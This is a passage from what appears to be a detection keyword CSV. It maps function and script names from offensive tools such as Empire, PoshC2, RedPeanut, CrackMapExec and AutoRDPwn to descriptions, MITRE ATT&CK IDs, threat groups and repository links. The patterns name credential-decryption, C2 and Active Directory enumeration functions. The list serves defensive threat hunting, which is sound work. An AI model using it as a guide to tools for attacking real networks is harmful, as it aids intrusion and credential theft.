TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CompressedAgent.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CompressedShellcode*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-CompressedShellcode.ps1*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*Get-ComputerDetails*","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*GetComputersFromActiveDirectory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider 
- APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-creditcarddata *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-CredPersist*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*getCrossC2Beacon*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*getCrossC2Site*","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","10","10","155","25","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z" +"*Get-DCBadPwdCount*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-SMBAutoBrute.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecodedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-DecodedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecryptedCpassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-DecryptedCpassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - 
CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DecryptedPassword*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*Get-DecryptedPassword*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Get-DecryptedSitelistPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SiteListPassword.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-delegation *All*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*get-delegation *Unconstrained*","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","115","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" +"*Get-DFSshare*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-DiscosdurosGet-PSDrive*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" +"*getdllbaseaddress*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" 
+"*get-dodgyprocesses*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-DomainAdmins.ps1*","offensive_tool_keyword","ScriptSentry","ScriptSentry finds misconfigured and dangerous logon scripts.","T1037 - T1037.005 - T1046","TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/techspence/ScriptSentry","1","0","N/A","7","1","44","3","2023-08-16T19:32:24Z","2023-07-22T03:17:58Z" +"*Get-DomainComputer -TrustedToAuth | select name","offensive_tool_keyword","AD exploitation cheat sheet","msds-allowedtodelegateto*","T1595 - T1590 - T1591 - T1213 - T1039 - T1592","N/A","N/A","N/A","Lateral movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DomainDFSShareV1*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainDFSShareV2*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainForeignGroupMember*","offensive_tool_keyword","AD exploitation cheat sheet","Abusing inter-forest trust Powersploit","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://powersploit.readthedocs.io/en/latest/Recon/Get-DomainForeignGroupMember/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Get-DomainManagedSecurityGroup*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainObjectACL -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-DomainSearcher*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*GetDomainsForEnumeration*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Get-DomainSpn*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - 